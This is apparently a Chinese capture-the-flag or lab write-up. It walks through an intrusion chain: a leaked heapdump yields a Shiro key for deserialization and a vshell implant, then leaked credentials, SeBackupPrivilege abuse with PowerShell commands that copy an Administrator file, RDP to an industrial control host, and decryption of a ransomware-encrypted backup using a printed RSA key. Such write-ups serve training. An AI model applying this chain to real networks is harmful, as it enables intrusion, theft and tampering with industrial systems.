shiro+heapdump

首先先拿fscan扫一下ip

可以发现存在heapdump的泄露

这个页面长的就很想shiro,扫一下指纹

果然是shiro

解密一下heapdump,可以得到shiro-key,这样就可以打shiro反序列化了

直接上线vshell

拿到flag1

工程师个人主机

然后再用fscan扫一下c段

可以扫到一下ftp。还有一个web,先看一下web

目录结构和ftp一样应该是把ftp的目录也给放到web了


再内部资料里发现了admin的账号密码还有内部通知和exel表格


看通知我们可以知道账号密码是由姓名+@+工号组成的,二表格是工程师的姓名加工号
使用第一个chenhua@0813即可登陆成功

我们可以发现其是再Backup Operators组内的,但是其并没有这给组内的特权,我用网上的提权方法都无法成功,应该是环境的问题,我这里就记录一下这个提权方法

https://github.com/k4sth4/SeBackupPrivilege
再GitHub上下载两个dll,进行如下操作就可以备份admin的目录了,而且可以使用dir来看admin目录

1
2
3
4
5
6
7
8
9
PS C:\Windows\system32> cd C:\Users\chenhua\Desktop\
PS C:\Users\chenhua\Desktop> Import-Module .\SeBackupPrivilegeUtils.dll
PS C:\Users\chenhua\Desktop> Import-Module .\SeBackupPrivilegeCmdLets.dll
PS C:\Users\chenhua\Desktop> Set-SeBackupPrivilege
PS C:\Users\chenhua\Desktop> Get-SeBackupPrivilege
SeBackupPrivilege is enabled
PS C:\Users\chenhua\Desktop> Copy-FileSeBackupPrivilege C:\Users\Administrator\flag\flag02.txt C:\Users\chenhua\Desktop\flag02.txt -Overwrite
Copied 350 bytes
PS C:\Users\chenhua\Desktop> cat flag02.txt

工程控制机器

看信息可以知道这个主机再.26,直接扫

可以发现其是172.22.26.11,直接rdp上去
进去后会强制进入控制系统,点锅炉开就可以得到flag

然后win+d来退到桌面

可以发现一个备份文件ScadaDB.sql.locky
直接看数据库会发现数据库全是空的

那么只好解密这个了。我们拿题目的密钥来解

1
2
3
4
<RSAKeyValue><Modulus>uoL2CAaVtMVp7b4/Ifcex2Artuu2tvtBO25JdMwAneu6gEPCrQvDyswebchA1LnV3e+OJV5kHxFTp/diIzSnmnhUmfZjYrshZSLGm1fTwcRrL6YYVsfVZG/4ULSDURfAihyN1HILP/WqCquu1oWo0CdxowMsZpMDPodqzHcFCxE=</Modulus><Exponent>AQAB</Exponent><P>2RPqaofcJ/phIp3QFCEyi0kj0FZRQmmWmiAmg/C0MyeX255mej8Isg0vws9PNP3RLLj25O1pbIJ+fqwWfUEmFw==</P><Q>2/QGgIpqpxODaJLQvjS8xnU8NvxMlk110LSUnfAh/E6wB/XUc89HhWMqh4sGo/LAX0n94dcZ4vLMpzbkVfy5Fw==</Q><DP>ulK51o6ejUH/tfK281A7TgqNTvmH7fUra0dFR+KHCZFmav9e/na0Q//FivTeC6IAtN5eLMkKwDSR1rBm7UPKKQ==</DP><DQ>PO2J541wIbvsCMmyfR3KtQbAmVKmPHRUkG2VRXLBV0zMwke8hCAE5dQkcct3GW8jDsJGS4r0JsOvIRq5gYAyHQ==</DQ><InverseQ>JS2ttB0WJm223plhJQrWqSvs9LdEeTd8cgNWoyTkMOkYIieRTRko/RuXufgxppl4bL9RRTI8e8tkHoPzNLK4bA==</InverseQ><D>tuLJ687BJ5RYraZac6zFQo178A8siDrRmTwozV1o0XGf3DwVfefGYmpLAC1X3QAoxUosoVnwZUJxPIfodEsieDoxRqVxMCcKbJK3nwMdAKov6BpxGUloALlxTi6OImT6w/roTW9OK6vlF54o5U/4DnQNUM6ss/2/CMM/EgM9vz0=</D></RSAKeyValue>


lFmBs4qEhrqJJDIZ6PXvOyckwF/sqPUXzMM/IzLM/MHu9UhAB3rW/XBBoVxRmmASQEKrmFZLxliXq789vTX5AYNFcvKlwF6+Y7vkeKMOANMczPWT8UU5UcGi6PQLsgkP3m+Q26ZD9vKRkVM5964hJLVzogAUHoyC8bUAwDoNc7g=

先把密钥转为pem格式的https://www.ssleye.com/ssltool/pem_xml.html

使用密钥来解密AESkey

得到AES key后就可以解密密文了,密文的钱16字节就是iv